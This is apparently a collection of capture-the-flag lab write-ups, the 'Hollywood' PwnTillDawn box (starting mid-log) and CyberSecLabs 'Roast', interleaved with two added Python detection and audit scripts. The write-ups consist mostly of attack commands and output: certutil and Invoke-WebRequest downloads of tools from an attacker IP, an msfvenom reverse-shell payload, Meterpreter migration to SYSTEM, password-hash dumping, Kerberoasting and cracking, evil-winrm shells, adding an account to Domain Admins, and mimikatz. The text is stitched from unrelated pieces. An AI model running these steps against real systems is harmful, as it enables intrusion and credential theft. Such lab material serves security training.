3640 416 conhost.exe x86 1 HOLLYWOOD\User C:\Windows\system32\conhost.exe
3776 3472 java.exe x86 1 HOLLYWOOD\User C:\Program Files\Java\jre1.8.0_231\bin\java.exe
3820 512 svchost.exe x86 0 NT AUTHORITY\SYSTEM C:\Windows\System32\svchost.exe
3840 864 dwm.exe x86 1 HOLLYWOOD\User C:\Windows\system32\Dwm.exe
3856 416 conhost.exe x86 1 HOLLYWOOD\User C:\Windows\system32\conhost.exe
3876 3608 explorer.exe x86 1 HOLLYWOOD\User C:\Windows\Explorer.EXE
3916 364 httpd.exe x86 1 HOLLYWOOD\User c:\xampp\apache\bin\httpd.exe
3968 512 wmpnetwk.exe x86 0 NT AUTHORITY\NETWORK SERVICE C:\Program Files\Windows Media Player\wmpnetwk.exe
4080 512 svchost.exe x86 0 NT AUTHORITY\LOCAL SERVICE C:\Windows\system32\svchost.exe
4632 416 conhost.exe x86 1 HOLLYWOOD\User C:\Windows\system32\conhost.exe
4824 512 taskhost.exe x86 1 HOLLYWOOD\User C:\Windows\system32\taskhost.exe
4912 416 conhost.exe x86 1 HOLLYWOOD\User C:\Windows\system32\conhost.exe
5004 3008 7777.exe x86 1 HOLLYWOOD\User c:\puck\7777.exe
5088 5004 cmd.exe x86 1 HOLLYWOOD\User C:\Windows\system32\cmd.exe
5356 4372 powershell.exe x86 1 HOLLYWOOD\User C:\Windows\System32\WindowsPowershell\v1.0\powershell.exe
5904 416 conhost.exe x86 1 HOLLYWOOD\User C:\Windows\system32\conhost.exe

meterpreter > migrate 3820
[*] Migrating from 5356 to 3820...
[*] Migration completed successfully.
meterpreter > shell
Process 5184 created.
Channel 1 created.
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.

C:\Windows\system32>whoami
whoami
nt authority\system

C:\Windows\system32>

certutil -urlcache -split -f http://10.66.66.210/fgdump.exe c:\puck\fgdump.exe
certutil -urlcache -split -f http://10.66.66.210/winpeas.exe c:\puck\winpeas.exe
certutil -urlcache -split -f http://10.66.66.210/winpeas.bat c:\puck\winpeas.bat
certutil -urlcache -split -f http://10.66.66.210/Chimichurri.exe c:\puck\Chimichurri.exe
certutil -urlcache -split -f http://10.66.66.210/7777.exe c:\puck\7777.exe

└──╼ $msfvenom -p windows/meterpreter/reverse_tcp lhost=10.66.66.210 lport=7777 -f exe > 7777.exe

multi/handler
run -j

 

powershell Invoke-Webrequest -OutFile C:\\Windows\\System32\\spool\\drivers\\color\\pwdump7.exe -Uri http://10.66.66.210/pwdump7.exe

certutil -urlcache -split -f http://10.66.66.210/pwdump8.exe c:\puck\pwdump8.exe

c:\puck>pwdump8.exe
pwdump8.exe

PwDump v8.2 - dumps windows password hashes - by Fulvio Zanetti & Andrea Petralia @ http://www.blackMath.it

Administrator:500:AAD3B435B51404EEAAD3B435B51404EE:31D6CFE0D16AE931B73C59D7E0C089C0
Guest:501:AAD3B435B51404EEAAD3B435B51404EE:31D6CFE0D16AE931B73C59D7E0C089C0
User:1000:AAD3B435B51404EEAAD3B435B51404EE:F9E1A02072D330DDF77AD82CB54D5EC4
HomeGroupUser$:1002:AAD3B435B51404EEAAD3B435B51404EE:283C3C4DC5544A73569F35F22A5B1DCA

c:\puck>
C:\Windows\system32>powershell -c Get-PSDrive
certutil -urlcache -split -f http://10.66.66.210/winpeas.exe c:\puck\winpeas.exe
certutil -urlcache -split -f http://10.66.66.210/winpeas.bat c:\puck\winpeas.bat

REG QUERY HKLM /v "EditionID" /s
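As an added example for the defensive side (not part of either write-up), the following Python detection logic runs over constructed process-creation records in a hypothetical "time|host|user|command" format and flags the command lines the mrblue and hollywood posts show: certutil -urlcache downloads, PowerShell Invoke-WebRequest -OutFile downloads, and net user /ADD followed within a short window by net localgroup administrators /add for the same account. The rule names, severities and the ten-minute window are my own assumptions.

```python
from dataclasses import dataclass
from datetime import datetime, timedelta
import re


@dataclass
class Event:
    time: datetime
    host: str
    user: str
    cmdline: str


SEVERITY = {                         # assumed severities
    "certutil_download": "medium",   # certutil -urlcache ... http://...  (ingress tool transfer)
    "powershell_download": "medium", # powershell Invoke-WebRequest -OutFile ... -Uri ...
    "local_user_add": "medium",      # net user /ADD <name> <password>
    "admin_group_add": "medium",     # net localgroup administrators /add <name>
    "new_local_admin": "high",       # both of the above for one account within the window
}
NET_USER = re.compile(r"\bnet1?(?:\.exe)?\s+user\b")
NET_ADMINS = re.compile(r"\bnet1?(?:\.exe)?\s+localgroup\s+administrators\b")

# Constructed records in a hypothetical "time|host|user|command" format; the command
# lines are the ones that appear in the write-ups plus two benign ones as negatives.
LOG = r"""
2020-08-26T09:25:00|HOLLYWOOD|HOLLYWOOD\User|certutil -urlcache -split -f http://10.66.66.210/7777.exe c:\puck\7777.exe
2020-08-26T09:26:10|HOLLYWOOD|HOLLYWOOD\User|powershell Invoke-Webrequest -OutFile C:\Windows\System32\spool\drivers\color\pwdump7.exe -Uri http://10.66.66.210/pwdump7.exe
2020-08-26T09:30:00|HOLLYWOOD|HOLLYWOOD\User|certutil -verify -urlfetch c:\puck\cert.cer
2020-08-26T09:31:00|HOLLYWOOD|HOLLYWOOD\User|whoami
2020-08-26T10:10:01|GNBUSCA-W054|NT AUTHORITY\SYSTEM|net user /ADD puck Geheim2020
2020-08-26T10:10:07|GNBUSCA-W054|NT AUTHORITY\SYSTEM|net localgroup administrators /add puck
"""


def parse_line(line: str) -> Event:
    """Parse one 'time|host|user|command' record."""
    time, host, user, cmdline = line.split("|", 3)
    return Event(datetime.fromisoformat(time), host, user, cmdline)


def classify(cmdline: str) -> list:
    """Tag one command line with every rule it matches (case-insensitive)."""
    c = cmdline.lower()
    tags = []
    if "certutil" in c and "-urlcache" in c and "http" in c:
        tags.append("certutil_download")
    if "powershell" in c and "invoke-webrequest" in c and "-outfile" in c:
        tags.append("powershell_download")
    if NET_USER.search(c) and "/add" in c:
        tags.append("local_user_add")
    if NET_ADMINS.search(c) and "/add" in c:
        tags.append("admin_group_add")
    return tags


def net_target(cmdline: str, keyword: str) -> str:
    """First non-switch token after `keyword`: the account a net.exe command acts on."""
    tokens = cmdline.split()
    lowered = [t.lower() for t in tokens]
    if keyword not in lowered:
        return ""
    for tok in tokens[lowered.index(keyword) + 1:]:
        if not tok.startswith("/"):
            return tok.lower()
    return ""


def detect(log: str, window: timedelta = timedelta(minutes=10)) -> list:
    """Return alerts (dicts) for the records in `log`, in time order."""
    events = sorted((parse_line(l) for l in log.splitlines() if l.strip()), key=lambda e: e.time)
    alerts, pending = [], {}          # pending: (host, account) -> time of 'net user /add'
    for ev in events:
        for tag in classify(ev.cmdline):
            alerts.append({"rule": tag, "severity": SEVERITY[tag], "host": ev.host,
                           "user": ev.user, "cmdline": ev.cmdline})
            if tag == "local_user_add":
                pending[(ev.host, net_target(ev.cmdline, "user"))] = ev.time
            elif tag == "admin_group_add":
                acct = net_target(ev.cmdline, "administrators")
                created = pending.get((ev.host, acct))
                if created is not None and ev.time - created <= window:
                    alerts.append({"rule": "new_local_admin", "severity": "high", "host": ev.host,
                                   "user": ev.user, "cmdline": f"account {acct!r}: created and added "
                                   f"to Administrators within {window}"})
    return alerts


if __name__ == "__main__":
    for a in detect(LOG):
        print(a["severity"].upper(), a["rule"], a["host"], a["cmdline"], sep="  ")
```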

Write-ups have been authorized for this machine by the PwnTillDawn Crew! We are just asking you to give us credit by adding a backlink to https://www.wizlynxgroup.com/ and https://online.pwntilldawn.com/ in your write-up.


csl-roast-nl

CyberSecLabs – Roast writeup

https://www.cyberseclabs.co.uk/labs/challenge-labs/all

As always, we start with an nmap scan.

kali@kali:/opt/evil-winrm$ nmap -Pn -vv -A 172.31.3.2
Starting Nmap 7.80 ( https://nmap.org ) at 2020-08-18 08:06 EDT
NSE: Loaded 151 scripts for scanning.
NSE: Script Pre-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 08:06
Completed NSE at 08:06, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 08:06
Completed NSE at 08:06, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 08:06
Completed NSE at 08:06, 0.00s elapsed
Initiating Parallel DNS resolution of 1 host. at 08:06
Completed Parallel DNS resolution of 1 host. at 08:06, 0.00s elapsed
Initiating Connect Scan at 08:06
Scanning 172.31.3.2 [1000 ports]
Discovered open port 53/tcp on 172.31.3.2
Discovered open port 139/tcp on 172.31.3.2
Discovered open port 445/tcp on 172.31.3.2
Discovered open port 135/tcp on 172.31.3.2
Discovered open port 3389/tcp on 172.31.3.2
Discovered open port 636/tcp on 172.31.3.2
Discovered open port 3269/tcp on 172.31.3.2
Discovered open port 593/tcp on 172.31.3.2
Discovered open port 3268/tcp on 172.31.3.2
Discovered open port 464/tcp on 172.31.3.2
Discovered open port 88/tcp on 172.31.3.2
Discovered open port 389/tcp on 172.31.3.2
Completed Connect Scan at 08:06, 6.49s elapsed (1000 total ports)
Initiating Service scan at 08:06
kali@kali:/opt$ nmap -Pn -sV --script "ldap* and not brute*" -p 389 172.31.3.2
Starting Nmap 7.80 ( https://nmap.org ) at 2020-08-17 08:51 EDT
Nmap scan report for 172.31.3.2
Host is up (0.10s latency).

PORT STATE SERVICE VERSION
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: roast.csl, Site: Default-First-Site-Name)
| ldap-brute:
| root:<empty> => Valid credentials
| admin:<empty> => Valid credentials
| administrator:<empty> => Valid credentials
| webadmin:<empty> => Valid credentials
| sysadmin:<empty> => Valid credentials
| netadmin:<empty> => Valid credentials
| guest:<empty> => Valid credentials
| user:<empty> => Valid credentials
| web:<empty> => Valid credentials
|_ test:<empty> => Valid credentials
| ldap-rootdse:
| LDAP Results
| <ROOT>
| domainFunctionality: 7
| forestFunctionality: 7
| domainControllerFunctionality: 7
| rootDomainNamingContext: DC=roast,DC=csl
| ldapServiceName: roast.csl:roast$@ROAST.CSL
| isGlobalCatalogReady: TRUE
| supportedSASLMechanisms: GSSAPI
| supportedSASLMechanisms: GSS-SPNEGO
| supportedSASLMechanisms: EXTERNAL
| supportedSASLMechanisms: DIGEST-MD5
| supportedLDAPVersion: 3
| supportedLDAPVersion: 2
| supportedLDAPPolicies: MaxPoolThreads
| supportedLDAPPolicies: MaxPercentDirSyncRequests
| supportedLDAPPolicies: MaxDatagramRecv
| supportedLDAPPolicies: MaxReceiveBuffer
| supportedLDAPPolicies: InitRecvTimeout
| supportedLDAPPolicies: MaxConnections
| supportedLDAPPolicies: MaxConnIdleTime
| supportedLDAPPolicies: MaxPageSize
| supportedLDAPPolicies: MaxBatchReturnMessages
| supportedLDAPPolicies: MaxQueryDuration
| supportedLDAPPolicies: MaxDirSyncDuration
| supportedLDAPPolicies: MaxTempTableSize
| supportedLDAPPolicies: MaxResultSetSize
| supportedLDAPPolicies: MinResultSets
| supportedLDAPPolicies: MaxResultSetsPerConn
| supportedLDAPPolicies: MaxNotificationPerConn
| supportedLDAPPolicies: MaxValRange
| supportedLDAPPolicies: MaxValRangeTransitive
| supportedLDAPPolicies: ThreadMemoryLimit
| supportedLDAPPolicies: SystemMemoryLimitPercent
| supportedControl: 1.2.840.113556.1.4.319
| supportedControl: 1.2.840.113556.1.4.801
| supportedControl: 1.2.840.113556.1.4.473
| supportedControl: 1.2.840.113556.1.4.528
| supportedControl: 1.2.840.113556.1.4.417
| supportedControl: 1.2.840.113556.1.4.619
| supportedControl: 1.2.840.113556.1.4.841
| supportedControl: 1.2.840.113556.1.4.529
| supportedControl: 1.2.840.113556.1.4.805
| supportedControl: 1.2.840.113556.1.4.521
| supportedControl: 1.2.840.113556.1.4.970
| supportedControl: 1.2.840.113556.1.4.1338
| supportedControl: 1.2.840.113556.1.4.474
| supportedControl: 1.2.840.113556.1.4.1339
| supportedControl: 1.2.840.113556.1.4.1340
| supportedControl: 1.2.840.113556.1.4.1413
| supportedControl: 2.16.840.1.113730.3.4.9
| supportedControl: 2.16.840.1.113730.3.4.10
| supportedControl: 1.2.840.113556.1.4.1504
| supportedControl: 1.2.840.113556.1.4.1852
| supportedControl: 1.2.840.113556.1.4.802
| supportedControl: 1.2.840.113556.1.4.1907
| supportedControl: 1.2.840.113556.1.4.1948
| supportedControl: 1.2.840.113556.1.4.1974
| supportedControl: 1.2.840.113556.1.4.1341
| supportedControl: 1.2.840.113556.1.4.2026
| supportedControl: 1.2.840.113556.1.4.2064
| supportedControl: 1.2.840.113556.1.4.2065
| supportedControl: 1.2.840.113556.1.4.2066
| supportedControl: 1.2.840.113556.1.4.2090
| supportedControl: 1.2.840.113556.1.4.2205
| supportedControl: 1.2.840.113556.1.4.2204
| supportedControl: 1.2.840.113556.1.4.2206
| supportedControl: 1.2.840.113556.1.4.2211
| supportedControl: 1.2.840.113556.1.4.2239
| supportedControl: 1.2.840.113556.1.4.2255
| supportedControl: 1.2.840.113556.1.4.2256
| supportedControl: 1.2.840.113556.1.4.2309
| supportedControl: 1.2.840.113556.1.4.2330
| supportedControl: 1.2.840.113556.1.4.2354
| supportedCapabilities: 1.2.840.113556.1.4.800
| supportedCapabilities: 1.2.840.113556.1.4.1670
| supportedCapabilities: 1.2.840.113556.1.4.1791
| supportedCapabilities: 1.2.840.113556.1.4.1935
| supportedCapabilities: 1.2.840.113556.1.4.2080
| supportedCapabilities: 1.2.840.113556.1.4.2237
| subschemaSubentry: CN=Aggregate,CN=Schema,CN=Configuration,DC=roast,DC=csl
| serverName: CN=ROAST,CN=Servers,CN=Default-First-Site-Name,CN=Sites,CN=Configuration,DC=roast,DC=csl
| schemaNamingContext: CN=Schema,CN=Configuration,DC=roast,DC=csl
| namingContexts: DC=roast,DC=csl
| namingContexts: CN=Configuration,DC=roast,DC=csl
| namingContexts: CN=Schema,CN=Configuration,DC=roast,DC=csl
| namingContexts: DC=DomainDnsZones,DC=roast,DC=csl
| namingContexts: DC=ForestDnsZones,DC=roast,DC=csl
| isSynchronized: TRUE
| highestCommittedUSN: 86066
| dsServiceName: CN=NTDS Settings,CN=ROAST,CN=Servers,CN=Default-First-Site-Name,CN=Sites,CN=Configuration,DC=roast,DC=csl
| dnsHostName: Roast.roast.csl
| defaultNamingContext: DC=roast,DC=csl
| currentTime: 20200817125113.0Z
|_ configurationNamingContext: CN=Configuration,DC=roast,DC=csl
| ldap-search:
| Context: DC=roast,DC=csl
| dn: DC=roast,DC=csl
| dn: CN=David Smith,OU=Roast,DC=roast,DC=csl
| objectClass: top
| objectClass: person
| objectClass: organizationalPerson
| objectClass: user
| cn: David Smith
| sn: Smith
| description: Your Password is WelcomeToR04st
| givenName: David
| distinguishedName: CN=David Smith,OU=Roast,DC=roast,DC=csl
| instanceType: 4
| whenCreated: 2020/05/15 06:30:43 UTC
| whenChanged: 2020/05/15 21:42:47 UTC
| displayName: David Smith
| uSNCreated: 16572
| uSNChanged: 32799
| name: David Smith
| objectGUID: 95a9772-f36-7344-9cc1-53d257cf635e
| userAccountControl: 66048
| badPwdCount: 0
| codePage: 0
| countryCode: 0
| badPasswordTime: 2020-05-16T01:47:26+00:00
| lastLogoff: 0
| lastLogon: 2020-05-18T02:48:58+00:00
| logonHours: \xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF
| pwdLastSet: 2020-05-16T01:46:13+00:00
| primaryGroupID: 513
| objectSid: 1-5-21-4133422454-1522376082-951199702-1103
| accountExpires: Never
| logonCount: 1
| sAMAccountName: dsmith
| sAMAccountType: 805306368
| userPrincipalName: dsmith@roast.csl
| objectCategory: CN=Person,CN=Schema,CN=Configuration,DC=roast,DC=csl
| dSCorePropagationData: 2020/05/15 06:46:18 UTC
| dSCorePropagationData: 2020/05/15 06:38:02 UTC
| dSCorePropagationData: 1601/01/01 00:00:00 UTC
| lastLogonTimestamp: 2020-05-16T01:48:13+00:00
| dn: CN=Cody Rhodes,OU=Roast,DC=roast,DC=csl
| objectClass: top
| objectClass: person
| objectClass: organizationalPerson
| objectClass: user
| cn: Cody Rhodes
| sn: Rhodes
| givenName: Cody
| distinguishedName: CN=Cody Rhodes,OU=Roast,DC=roast,DC=csl
| instanceType: 4
| whenCreated: 2020/05/15 06:34:11 UTC
| whenChanged: 2020/05/15 21:41:51 UTC
| displayName: Cody Rhodes
| uSNCreated: 16605
| memberOf: CN=Remote Management Users,CN=Builtin,DC=roast,DC=csl
| uSNChanged: 32794
| name: Cody Rhodes
| objectGUID: 264ab96b-32e6-7f47-9f71-45b9eae6ee8
| userAccountControl: 66048
| badPwdCount: 0
| codePage: 0
| countryCode: 0
| badPasswordTime: 2020-05-16T01:47:26+00:00
| lastLogoff: 0
| lastLogon: 2020-05-16T01:58:03+00:00
| logonHours: \xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF
| pwdLastSet: 2020-05-16T01:47:17+00:00
| primaryGroupID: 513
| objectSid: 1-5-21-4133422454-1522376082-951199702-1104
| accountExpires: Never
| logonCount: 2
| sAMAccountName: crhodes
| sAMAccountType: 805306368
| userPrincipalName: crhodes@roast.csl
| objectCategory: CN=Person,CN=Schema,CN=Configuration,DC=roast,DC=csl
| dSCorePropagationData: 2020/05/15 06:46:18 UTC
| dSCorePropagationData: 2020/05/15 06:37:46 UTC
| dSCorePropagationData: 1601/01/01 00:00:00 UTC
| lastLogonTimestamp: 2020-05-15T10:54:23+00:00
| dn: CN=Steve Smith,OU=Roast,DC=roast,DC=csl
| objectClass: top
| objectClass: person
| objectClass: organizationalPerson
| objectClass: user
| cn: Steve Smith
| sn: Smith
| givenName: Steve
| distinguishedName: CN=Steve Smith,OU=Roast,DC=roast,DC=csl
| instanceType: 4
| whenCreated: 2020/05/15 06:35:06 UTC
| whenChanged: 2020/05/15 06:38:17 UTC
| displayName: Steve Smith
| uSNCreated: 16612
| uSNChanged: 16629
| name: Steve Smith
| objectGUID: 66dc74ae-c214-4e42-94e3-44092523e22
| userAccountControl: 66048
| badPwdCount: 2
| codePage: 0
| countryCode: 0
| badPasswordTime: 2020-05-16T01:47:26+00:00
| lastLogoff: 0
| lastLogon: Never
| pwdLastSet: 2020-05-15T10:40:32+00:00
| primaryGroupID: 513
| objectSid: 1-5-21-4133422454-1522376082-951199702-1105
| accountExpires: 30828-09-14T06:53:31+00:00
| logonCount: 0
| sAMAccountName: ssmith
| sAMAccountType: 805306368
| userPrincipalName: ssmith@roast.csl
| objectCategory: CN=Person,CN=Schema,CN=Configuration,DC=roast,DC=csl
| dSCorePropagationData: 2020/05/15 06:46:18 UTC
| dSCorePropagationData: 2020/05/15 06:38:17 UTC
| dSCorePropagationData: 1601/01/01 00:00:00 UTC
|_ dn: CN=Roast Svc,OU=Roast,DC=roast,DC=csl
Service Info: Host: ROAST; OS: Windows; CPE: cpe:/o:microsoft:windows

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 10.48 seconds
kali@kali:/opt$
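The ldap-search output above is what a defender should be auditing too: the `description` attribute of `David Smith` carries a password in clear text, and `userAccountControl: 66048` on every user decodes to NORMAL_ACCOUNT plus DONT_EXPIRE_PASSWORD. The following is an added audit script, not part of the original write-up and not from nmap; it parses the `| attr: value` format the NSE script prints, flags password-like descriptions and risky UAC bits, and runs against a constructed excerpt of the output shown above. The bit values are the documented userAccountControl flags; the keyword regex is an assumption you should tune for your own directory.

```python
import re
from collections import defaultdict

# Documented userAccountControl bit flags (a subset relevant to this audit).
UAC_FLAGS = {
    0x0002: "ACCOUNTDISABLE",
    0x0020: "PASSWD_NOTREQD",
    0x0200: "NORMAL_ACCOUNT",
    0x10000: "DONT_EXPIRE_PASSWORD",
    0x400000: "DONT_REQ_PREAUTH",
}

# Flags that deserve a finding when set on an ordinary user account.
RISKY_UAC = ("DONT_EXPIRE_PASSWORD", "PASSWD_NOTREQD", "DONT_REQ_PREAUTH")

# Assumed keyword list for spotting credentials left in description fields.
PASSWORD_HINT = re.compile(r"\b(pass(word|wd)?|pwd|credentials?)\b", re.IGNORECASE)

# Constructed excerpt of the nmap ldap-search output shown in the write-up.
SAMPLE = """\
| ldap-search:
| Context: DC=roast,DC=csl
| dn: DC=roast,DC=csl
| dn: CN=David Smith,OU=Roast,DC=roast,DC=csl
| objectClass: top
| objectClass: person
| objectClass: user
| cn: David Smith
| description: Your Password is WelcomeToR04st
| userAccountControl: 66048
| sAMAccountName: dsmith
| dn: CN=Cody Rhodes,OU=Roast,DC=roast,DC=csl
| objectClass: top
| objectClass: user
| cn: Cody Rhodes
| memberOf: CN=Remote Management Users,CN=Builtin,DC=roast,DC=csl
| userAccountControl: 66048
|_ sAMAccountName: crhodes
"""


def parse_ldap_search(text):
    """Parse nmap ldap-search output into a list of {attribute: [values]} dicts.

    Each 'dn:' line starts a new entry; every later 'key: value' line is
    appended to that entry, so multi-valued attributes keep all their values.
    """
    entries = []
    current = None
    for raw in text.splitlines():
        line = raw.lstrip("|_ ").strip()      # drop the NSE "| " / "|_ " prefix
        if ": " not in line:                  # script header, empty line, etc.
            continue
        key, _, value = line.partition(": ")
        if key == "dn":
            current = defaultdict(list)
            current["dn"].append(value)
            entries.append(current)
        elif current is not None:
            current[key].append(value)
    return entries


def decode_uac(value):
    """Return the names of the known flag bits set in a userAccountControl value."""
    v = int(value)
    return [name for bit, name in UAC_FLAGS.items() if v & bit]


def audit_users(entries):
    """Return (sAMAccountName, message) findings for user objects."""
    findings = []
    for e in entries:
        if "user" not in e.get("objectClass", []):
            continue
        sam = e.get("sAMAccountName", ["?"])[0]
        for desc in e.get("description", []):
            if PASSWORD_HINT.search(desc):
                findings.append((sam, "description mentions a password: " + desc))
        for uac in e.get("userAccountControl", []):
            for flag in decode_uac(uac):
                if flag in RISKY_UAC:
                    findings.append((sam, "userAccountControl has " + flag))
    return findings


if __name__ == "__main__":
    for sam, msg in audit_users(parse_ldap_search(SAMPLE)):
        print(f"[!] {sam}: {msg}")
```

On the sample this reports the clear-text password in dsmith's description and DONT_EXPIRE_PASSWORD on both accounts; the same parser can be pointed at a saved `nmap -oN` file from an authorised scan of your own domain controller.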

We make sure we have the latest impacket installed.

kali@kali:/opt$ sudo git-clone https://github.com/SecureAuthCorp/impacket.git
sudo: git-clone: command not found
kali@kali:/opt$ sudo git clone https://github.com/SecureAuthCorp/impacket.git
Cloning into 'impacket'...
remote: Enumerating objects: 18128, done.
remote: Total 18128 (delta 0), reused 0 (delta 0), pack-reused 18128
Receiving objects: 100% (18128/18128), 5.97 MiB | 4.64 MiB/s, done.
Resolving deltas: 100% (13833/13833), done.
kali@kali:/opt$ cd impacket/
kali@kali:/opt/impacket$ pip3 install .


kali@kali:/opt/impacket$ crackmapexec smb 172.31.3.2 -u dsmith -p WelcomeToR04st
SMB 172.31.3.2 445 ROAST [*] Windows 10.0 Build 17763 (name:ROAST) (domain:roast.csl) (signing:True) (SMBv1:False)
SMB 172.31.3.2 445 ROAST [+] roast.csl\dsmith:WelcomeToR04st
kali@kali:/opt/evil-winrm$ crackmapexec smb 172.31.3.2 -u dsmith -p WelcomeToR04st --shares
SMB 172.31.3.2 445 ROAST [*] Windows 10.0 Build 17763 (name:ROAST) (domain:roast.csl) (signing:True) (SMBv1:False)
SMB 172.31.3.2 445 ROAST [+] roast.csl\dsmith:WelcomeToR04st
SMB 172.31.3.2 445 ROAST [+] Enumerated shares
SMB 172.31.3.2 445 ROAST Share Permissions Remark
SMB 172.31.3.2 445 ROAST ----- ----------- ------
SMB 172.31.3.2 445 ROAST ADMIN$ Remote Admin
SMB 172.31.3.2 445 ROAST C$ Default share
SMB 172.31.3.2 445 ROAST IPC$ READ Remote IPC
SMB 172.31.3.2 445 ROAST NETLOGON READ Logon server share
SMB 172.31.3.2 445 ROAST SYSVOL READ Logon server share
kali@kali:/opt/evil-winrm$
kali@kali:/opt/impacket$ crackmapexec winrm 172.31.3.2 -u dsmith -p WelcomeToR04st
WINRM 172.31.3.2 5985 ROAST [*] http://172.31.3.2:5985/wsman
WINRM 172.31.3.2 5985 ROAST [-] ROAST0\dsmith:WelcomeToR04st "Failed to authenticate the user dsmith with ntlm"
kali@kali:/tmp$ GetUserSPNs.py -request -dc-ip 172.31.3.2 roast.csl/crhodes -outputfile hashes.kerberoast
Impacket v0.9.22.dev1+20200813.221956.1c893884 - Copyright 2020 SecureAuth Corporation

Password:WelcomeToR04st
ServicePrincipalName Name MemberOf PasswordLastSet LastLogon Delegation
-------------------- -------- ----------------------------------------------------- -------------------------- --------- ----------
roast/ROAST roastsvc CN=Remote Management Users,CN=Builtin,DC=roast,DC=csl 2020-05-15 02:35:50.302845 <never>
kali@kali:/tmp$ cat hashes.kerberoast
$krb5tgs$23$*roastsvc$ROAST.CSL$roast/ROAST*$a06f00e18dbcc60631026290cd49c8c8$[...]
kali@kali:/tmp$
kali@kali:/tmp$ john --wordlist=/usr/share/wordlists/rockyou.txt hashes.kerberoast
Using default input encoding: UTF-8
Loaded 1 password hash (krb5tgs, Kerberos 5 TGS etype 23 [MD4 HMAC-MD5 RC4])
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
!!!watermelon245 (?)
1g 0:00:00:25 DONE (2020-08-18 05:25) 0.03957g/s 567616p/s 567616c/s 567616C/s !!12Honey.. 0860776252
Use the "--show" option to display all of the cracked passwords reliably
Session completed
kali@kali:/tmp$
kali@kali:/opt/evil-winrm$ ruby evil-winrm.rb -i 172.31.3.2 -u roastsvc -p '!!!watermelon245'

Evil-WinRM shell v2.3

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\roastsvc\Documents>
kali@kali:/opt/evil-winrm$ crackmapexec winrm 172.31.3.2 -u crhodes -p WelcomeToR04st
WINRM 172.31.3.2 5985 ROAST [*] http://172.31.3.2:5985/wsman
WINRM 172.31.3.2 5985 ROAST [+] ROAST0\crhodes:WelcomeToR04st (Pwn3d!)
kali@kali:/opt/evil-winrm$
kali@kali:/opt/evil-winrm$ ruby evil-winrm.rb -i 172.31.3.2 -u crhodes -p 'WelcomeToR04st'

Evil-WinRM shell v2.3

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\crhodes\Documents> cd c:\puck

*Evil-WinRM* PS C:\puck> upload /opt/Bloodhound/Ingestors/Sharphound.exe
Info: Uploading /opt/Bloodhound/Ingestors/Sharphound.exe to C:\puck\Sharphound.exe


Data: 1110016 bytes of 1110016 bytes copied

Info: Upload successful!

*Evil-WinRM* PS C:\puck> upload /opt/Bloodhound/Ingestors/Sharphound.ps1
Info: Uploading /opt/Bloodhound/Ingestors/Sharphound.ps1 to C:\puck\Sharphound.ps1


Data: 1297764 bytes of 1297764 bytes copied

Info: Upload successful!

*Evil-WinRM* PS C:\puck> dir


Directory: C:\puck


Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 8/18/2020 3:42 AM 832512 Sharphound.exe
-a---- 8/18/2020 3:42 AM 973323 Sharphound.ps1


*Evil-WinRM* PS C:\puck> ./Sharphound.exe
-----------------------------------------------
Initializing SharpHound at 3:42 AM on 8/18/2020
-----------------------------------------------

Resolved Collection Methods: Group, Sessions, Trusts, ACL, ObjectProps, LocalGroups, SPNTargets, Container

[+] Creating Schema map for domain ROAST.CSL using path CN=Schema,CN=Configuration,DC=ROAST,DC=CSL
[+] Cache File not Found: 0 Objects in cache

[+] Pre-populating Domain Controller SIDS
Status: 0 objects finished (+0) -- Using 19 MB RAM
Status: 61 objects finished (+61 61)/s -- Using 26 MB RAM
Enumeration finished in 00:00:01.8335102
Compressing data to .\20200818034254_BloodHound.zip
You can upload this file directly to the UI

SharpHound Enumeration Completed at 3:42 AM on 8/18/2020! Happy Graphing!

*Evil-WinRM* PS C:\puck> dir


Directory: C:\puck


Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 8/18/2020 3:42 AM 8935 20200818034254_BloodHound.zip
-a---- 8/18/2020 3:42 AM 832512 Sharphound.exe
-a---- 8/18/2020 3:42 AM 973323 Sharphound.ps1
-a---- 8/18/2020 3:42 AM 10118 ZDU2MDE4M2MtOTJlZC00MTRlLWFhMmEtOGJlM2E2ODA4ZjUy.bin
*Evil-WinRM* PS C:\puck>
*Evil-WinRM* PS C:\puck> download 20200819234325_BloodHound.zip /tmp/20200819234325_BloodHound.zip
Info: Downloading C:\puck\20200819234325_BloodHound.zip to /tmp/20200819234325_BloodHound.zip

Info: Download successful!
*Evil-WinRM* PS C:\puck>


net group "domain admins" roastsvc /add

*Evil-WinRM* PS C:\users\roastsvc\Documents> ./mimikatz.exe "privilege:debug" "lsadump::lsa /patch" "exit"

.#####. mimikatz 2.2.0 (x64) #18362 May 2 2020 16:23:51
.## ^ ##. "A La Vie, A L'Amour" - (oe.eo)
## / \ ## /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
## \ / ## > http://blog.gentilkiwi.com/mimikatz
'## v ##' Vincent LE TOUX ( vincent.letoux@gmail.com )
'#####' > http://pingcastle.com / http://mysmartlogon.com ***/

mimikatz(commandline) # privilege:debug
ERROR mimikatz_doLocal ; "privilege:debug" command of "standard" module not found !

Module : standard
Full name : Standard module
Description : Basic commands (does not require module name)

exit - Quit mimikatz
cls - Clear screen (doesn't work with redirections, like PsExec)
answer - Answer to the Ultimate Question of Life, the Universe, and Everything
coffee - Please, make me a coffee!
sleep - Sleep an amount of milliseconds
log - Log mimikatz input/output to file
base64 - Switch file input/output base64
version - Display some version informations
cd - Change or display current directory
localtime - Displays system local date and time (OJ command)
hostname - Displays system local hostname

mimikatz(commandline) # lsadump::lsa /patch
Domain : ROAST0 / S-1-5-21-4133422454-1522376082-951199702

